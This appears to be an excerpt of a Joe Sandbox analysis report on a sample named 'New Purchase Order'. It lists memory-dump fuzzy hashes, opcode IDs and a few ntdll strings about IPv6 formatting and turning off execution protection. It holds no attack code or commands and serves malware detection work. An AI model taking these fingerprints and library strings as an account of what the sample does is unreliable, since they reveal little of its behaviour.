                                                          • Instruction ID: 736ad687224bcf12f3933ee192bd1ff54304d5f8a2644ef499c0a0cb38e07d2d
                                                          • Opcode Fuzzy Hash: 0e53614ecf0fe164042b94102c3cb61be6c0bd67236e3885dbbf5ccff5b00f9e
                                                          • Instruction Fuzzy Hash: 40F06271A0124EDFCB04EFA9C515A9EB7B4FF18700F108159B959EB385EA38EB01CB51
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5968e58dfb5d185f826df63e9038743e7b49cc87a8eb97f580ca1b493967734
                                                          • Instruction ID: 95aee2ece4db5091a1a7be1200a32d88139534c4d4bd9e4beb498d367e346d78
                                                          • Opcode Fuzzy Hash: e5968e58dfb5d185f826df63e9038743e7b49cc87a8eb97f580ca1b493967734
                                                          • Instruction Fuzzy Hash: F1F0BE319166ED9FF732CB6CC148B21BBD89B08724F08896BDA89C7902CF35DE80C651
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b182abf5920999ab4228a7a65bad4fb6eb81ec8a16a99ec0045bbaa5b0ddaee
                                                          • Instruction ID: 0dc5c84f7ead99826317418c153401dca40ce3bdb5b0df6258d2fab0c2f5c6fa
                                                          • Opcode Fuzzy Hash: 2b182abf5920999ab4228a7a65bad4fb6eb81ec8a16a99ec0045bbaa5b0ddaee
                                                          • Instruction Fuzzy Hash: FFF0273641DA805ECB736B2C64503D16F69B7421A4F1E1089D5A897245C6748683C321
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2883778c4db585cf114fda7013031f312519114efdeb50b39fb156271056972b
                                                          • Instruction ID: 3db138d0db95ed299d08bce2e215a8702cfa7364e8ccb4819e3104682c0c9ab7
                                                          • Opcode Fuzzy Hash: 2883778c4db585cf114fda7013031f312519114efdeb50b39fb156271056972b
                                                          • Instruction Fuzzy Hash: 17F027715116579FE332D75CC1C8B11BBD8DB447B4F09946DD90AC7512C760FE80CA51
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction ID: ac05fc2f8c11e837a6c30123f473e00098125d6345a36596a186774d56a7f7dd
                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction Fuzzy Hash: FBE0D8723006412BE712AE5D8CC0F57776EDFD2B14F040079B9049F251CAE2DE09C3A5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction ID: 77e4d8d1c93a864e495f4173af6b7b16fa3ba6b524d0642807f269eb8ab49415
                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction Fuzzy Hash: 19F0E572100308DFE3218F09D840F52B7F8EB15368F11C025E608EB160E339ED40CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction ID: 5d9ce5db99264f8d810e080b7e6a7010a11a1806985d26054e007fdbd70e0ab3
                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction Fuzzy Hash: 5CF0E5392043499BDB16DF19C040AD67FA4FB41354B044055FD42CB341EB36EB81CB52
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction ID: 6d84fcb6c52d47bb0e039fe8bae58ee9f3acde12ce2b4244b9a2996504619fcb
                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction Fuzzy Hash: 93E0D832654189ABD3223A5D8800B6AF7A5DBD07A0F150429E610CB161EB70DE40D7D8
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 884691c3e99fe1872b3692d35ae00be169e63056fe19eb4c022e706d0b47fba0
                                                          • Instruction ID: 3312cd48588439433e8007110af6886f6fd867ab179ddece729c7d3435e75734
                                                          • Opcode Fuzzy Hash: 884691c3e99fe1872b3692d35ae00be169e63056fe19eb4c022e706d0b47fba0
                                                          • Instruction Fuzzy Hash: 02F0E532A255954FEBB2D72CD244B5177E8BB28731F1A09A4D40CC791AC720ECC0C650
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction ID: 780956da6039067087ccc0a5309947c636b56e8a5afd27434023e958627869ff
                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction Fuzzy Hash: A1E0DF32A40110BBDB2297998D05F9ABEACDBA4FA0F150055BA00E7090E530EF00D690
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction ID: e8600683bdecbdc17a97a5debe4e92a90ca977677fced12a102aefe0cf975069
                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction Fuzzy Hash: CEE09B316443589BDB258A2DC140A53B7ECDFD5665F1980F9ED0D47616C233F8C2C6D1
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a4ab87fa7ac528459110ac7946ea05e87e89228bc98f2570b46320d917bc5b9
                                                          • Instruction ID: bfdb670d8162d3d2ca6a5602619db5dc017b26e20a497ac8a22d38ceb53e99b1
                                                          • Opcode Fuzzy Hash: 6a4ab87fa7ac528459110ac7946ea05e87e89228bc98f2570b46320d917bc5b9
                                                          • Instruction Fuzzy Hash: F190023124140906D641715848046060049A7D2341F99C012A142C554EC6598B5AAB66
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b004fb9e753385d9d66a08d978ed1b3e2179156cb10cd8a05718cdce47714a73
                                                          • Instruction ID: cd78d147b4094b239a3303fdd4e1aeef01f8134047029a74b913e6446621a1a2
                                                          • Opcode Fuzzy Hash: b004fb9e753385d9d66a08d978ed1b3e2179156cb10cd8a05718cdce47714a73
                                                          • Instruction Fuzzy Hash: 29900221242446565A45B15848045074046A7E2341799C012A241C950CC52A9A5AD726
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54ba77bdc79f698a88f0000c6db3bb0ee77134c18fea12f2ec302f65f80d6360
                                                          • Instruction ID: b1ff1479326d5f6f8e637c3ca06679f5887aa0ed26663bdb0b65bc2e899f83e1
                                                          • Opcode Fuzzy Hash: 54ba77bdc79f698a88f0000c6db3bb0ee77134c18fea12f2ec302f65f80d6360
                                                          • Instruction Fuzzy Hash: 7C90022120544946D60075585808A06004597D2305F59D011A206C595DC6398A55A236
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66f40b7ac81484c40d47bd42a2e0db069ae9e2a7b8b0224d8abb9d95b675b3cd
                                                          • Instruction ID: 511ef9b94be527139b0fa077cce3120bbb8c280c39f45355a6f30df503f1fb5e
                                                          • Opcode Fuzzy Hash: 66f40b7ac81484c40d47bd42a2e0db069ae9e2a7b8b0224d8abb9d95b675b3cd
                                                          • Instruction Fuzzy Hash: A390022921340506D6807158580860A004597D3302F99D415A101D558CC9198A6D5326
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 977f45191edb8a705cc8abca2035b7e46e2c08171fba4c43440930fe01394923
                                                          • Instruction ID: ccffff633d38276d01806f1037d3ac5bf7ca4cb0faaeba6d494dc5d7a5bb3bfa
                                                          • Opcode Fuzzy Hash: 977f45191edb8a705cc8abca2035b7e46e2c08171fba4c43440930fe01394923
                                                          • Instruction Fuzzy Hash: CE90022130140507D640715858186064045E7E3301F59D011E141C554CD9198A5A5327
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cf89bcd80b451e9616583d5c965e201ca91a59d85ed6498cbede2ae60cf9a44
                                                          • Instruction ID: 24f613152c320bf21247f7636e917afa89bd24034dba773aefbffc09a5583ae8
                                                          • Opcode Fuzzy Hash: 7cf89bcd80b451e9616583d5c965e201ca91a59d85ed6498cbede2ae60cf9a44
                                                          • Instruction Fuzzy Hash: DF90023120140906D60075985808646004597E2301F59D011A602C555EC6698A956236
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6661973bf85f062d0f3eabe761f03de4c8a46488061cfaac26d9e63553ab1722
                                                          • Instruction ID: fe6a39e06d26ca3cdbe4d254c260a9f1b66f77c56190971459fa55cdae297953
                                                          • Opcode Fuzzy Hash: 6661973bf85f062d0f3eabe761f03de4c8a46488061cfaac26d9e63553ab1722
                                                          • Instruction Fuzzy Hash: 2890022160540906D64071585818706005597D2301F59D011A102C554DC65D8B5967A6
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cb8b98189ff73d5e39c5ef3e335bc03a5b3348af8e23b55235b7962d8c7fd0b
                                                          • Instruction ID: 0a4bb79bd1401c47fe03717c1f342d2df5f40d19c64169c3f2ee4c4e184b2c9b
                                                          • Opcode Fuzzy Hash: 3cb8b98189ff73d5e39c5ef3e335bc03a5b3348af8e23b55235b7962d8c7fd0b
                                                          • Instruction Fuzzy Hash: 4190023120140907D60071585908707004597D2301F59D411A142C558DD65A8A556226
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bc2c2be044084bf6893b48090821c49f79f318a1eef59d2c8012e1915c18961
                                                          • Instruction ID: c5ad4c716b35ad0a44b957d0cddeaf47fe06d2c57e4e17c3158cf1cc77b83828
                                                          • Opcode Fuzzy Hash: 8bc2c2be044084bf6893b48090821c49f79f318a1eef59d2c8012e1915c18961
                                                          • Instruction Fuzzy Hash: 0190023120140D46D60071584804B46004597E2301F59C016A112C654DC619CA557626
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5eb8788d2f2e888f085c796ccecd84ffe3a53ae4a93b7cc9de5655b9db6281bd
                                                          • Instruction ID: 94d99f606a976b52f75adeb79427bd36359f4cce27b6acdccc93246272cc8b4e
                                                          • Opcode Fuzzy Hash: 5eb8788d2f2e888f085c796ccecd84ffe3a53ae4a93b7cc9de5655b9db6281bd
                                                          • Instruction Fuzzy Hash: F890023120180906D60071584C1470B004597D2302F59C011A216C555DC6298A556676
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30ac0ffe6dfe27e48fc7b096a40ce9209cf7f12380404f2a52f71ef2ce875936
                                                          • Instruction ID: e0664fad17c2e074a34f2b2f77139716bd3c9a75c3a796186c08bc6cd599f4a8
                                                          • Opcode Fuzzy Hash: 30ac0ffe6dfe27e48fc7b096a40ce9209cf7f12380404f2a52f71ef2ce875936
                                                          • Instruction Fuzzy Hash: EA90023120180906D60071584C08747004597D2302F59C011A616C555EC669CA956636
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a99cbb07df69fa7cfa06808a9d0e1bcd71e255a294dd1243a320eb16afb0bbf7
                                                          • Instruction ID: fbb132b7ea10a337b4c7f24cf79513b0de5ca30e896cedc25276ebe4b035cccd
                                                          • Opcode Fuzzy Hash: a99cbb07df69fa7cfa06808a9d0e1bcd71e255a294dd1243a320eb16afb0bbf7
                                                          • Instruction Fuzzy Hash: EE90022160140546464071688C449064045BBE3311759C121A199C550DC55D8A69576A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef9234a1c9059309379379cfd33ba3250369315922b56d88947b6b924ea6cfe5
                                                          • Instruction ID: b6cedbde76560966e5ea3630ba8aac8156b7268ec612a6d3725babdf4dd91a72
                                                          • Opcode Fuzzy Hash: ef9234a1c9059309379379cfd33ba3250369315922b56d88947b6b924ea6cfe5
                                                          • Instruction Fuzzy Hash: 16900221211C0546D70075684C14B07004597D2303F59C115A115C554CC9198A655626
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf5c5a486efd88805995be66a3382b1bbe935f0f46dddddf40f94724a44c6444
                                                          • Instruction ID: 5ec38917a39d10aa92e073067734a52d8d922790faa8c91f973d38aea9b9a576
                                                          • Opcode Fuzzy Hash: bf5c5a486efd88805995be66a3382b1bbe935f0f46dddddf40f94724a44c6444
                                                          • Instruction Fuzzy Hash: 4F90026134140946D60071584814B060045D7E3301F59C015E206C554DC61DCE56622B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b190b5c59b1a4ad1a9004c5267464508188337a303f232e5d7daf26a7d633f0
                                                          • Instruction ID: 46d03c8491061b7a62e6bcbf56870cc7311b3128088c96dffc6984b2d0e0d123
                                                          • Opcode Fuzzy Hash: 7b190b5c59b1a4ad1a9004c5267464508188337a303f232e5d7daf26a7d633f0
                                                          • Instruction Fuzzy Hash: 3490026121140546D60471584804706008597E3301F59C012A315C554CC52D8E65522A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19a0387ccb1582c66cfd697c5d7c22310cd3e597c1657110eaa88b36e60fdb5d
                                                          • Instruction ID: 85da451d6cf76f0b3b7eba656aa9e91dcb69f3cc14afd6043bd9b081f40ac957
                                                          • Opcode Fuzzy Hash: 19a0387ccb1582c66cfd697c5d7c22310cd3e597c1657110eaa88b36e60fdb5d
                                                          • Instruction Fuzzy Hash: 5490022160140A06D60171584804616004A97D2341F99C022A202C555ECA298B96A236
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c41a1996226a98b16a1653af5db3d5fdf06af1df49ae3c75eed5c575462cc5
                                                          • Instruction ID: b9efae5f86612867bd3a417a63da9676b4281de60276697dc3db8cd25fae09d5
                                                          • Opcode Fuzzy Hash: 25c41a1996226a98b16a1653af5db3d5fdf06af1df49ae3c75eed5c575462cc5
                                                          • Instruction Fuzzy Hash: F590027120140906D64071584804746004597D2301F59C011A606C554EC65D8FD9676A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7868ca598d630e6c5958eac21cfb4247c892e73d13e400167c8b6f38c862c3da
                                                          • Instruction ID: be1b5fddb4bb6a037c775debff061645344e8bb8353c86f6b91932e35d056f42
                                                          • Opcode Fuzzy Hash: 7868ca598d630e6c5958eac21cfb4247c892e73d13e400167c8b6f38c862c3da
                                                          • Instruction Fuzzy Hash: 8B90026120180907D64075584C04607004597D2302F59C011A306C555ECA2D8E55623A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 371eb6e9cf34aeb8b4dee13304b1865494bad338c60dd75f46b64cfd017c21d1
                                                          • Instruction ID: fa1f55b67ce15a14cd75499017a75e86db99e1c580b35cc08ede9c292ea373a0
                                                          • Opcode Fuzzy Hash: 371eb6e9cf34aeb8b4dee13304b1865494bad338c60dd75f46b64cfd017c21d1
                                                          • Instruction Fuzzy Hash: 0C90022130140906D602715848146060049D7D3345F99C012E242C555DC6298B57A237
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ad68cccffc80e2ca4f0e31dbcc4bdf372a8bde5745e0fd2a7839de5f95cbf91d
                                                          • Instruction ID: d43bc00f85bb4cbcab3c0f396f167b4397f49e8a9d2a3aac7973cb5488a6991e
                                                          • Opcode Fuzzy Hash: ad68cccffc80e2ca4f0e31dbcc4bdf372a8bde5745e0fd2a7839de5f95cbf91d
                                                          • Instruction Fuzzy Hash: CE90022124140D06D640715888147070046D7D2701F59C011A102C554DC61A8B6967B6
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae910196ef9fe2390b84cfd0944948cd847531b8a83ea699ccd248c9f7c9d468
                                                          • Instruction ID: f9ad920495e6aca92c65bb2b80419d2ef0ba867f813436e1e3670d9f441b6574
                                                          • Opcode Fuzzy Hash: ae910196ef9fe2390b84cfd0944948cd847531b8a83ea699ccd248c9f7c9d468
                                                          • Instruction Fuzzy Hash: 5B90022120184946D64072584C04B0F414597E3302F99C019A515E554CC9198A595726
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 7b606ec47194a7880d95fdda89e89fd87bfeb947b0f94001990fe80f87f5ce2a
                                                          • Instruction ID: ef321c5d7aa2726b4e1cf3dfeed328d66d4badb9b439e81791db775c53b67d57
                                                          • Opcode Fuzzy Hash: 7b606ec47194a7880d95fdda89e89fd87bfeb947b0f94001990fe80f87f5ce2a
                                                          • Instruction Fuzzy Hash: 2851C4B6A0011AAECF25EB9D88D097EFBB9BB493407148269F4A5D7641D334DF50C7A0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: fa79c256ec596a69605edc70603c1072c39a2ef642b69f7adaa4e9edbb3de320
                                                          • Instruction ID: bf9ba9ce4cf6d9c55cbea00268c74071acbf52e0a13d27c14f7f1f9c93cf39f1
                                                          • Opcode Fuzzy Hash: fa79c256ec596a69605edc70603c1072c39a2ef642b69f7adaa4e9edbb3de320
                                                          • Instruction Fuzzy Hash: 5051E475A00646AFCF70DF9CC89097EBBFAEB58300B04846DF696D7641E6B4DB408760
                                                          Strings
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018B4725
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018B4742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018B46FC
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018B4655
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 018B4787
                                                          • ExecuteOptions, xrefs: 018B46A0
                                                          • Execute=1, xrefs: 018B4713
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
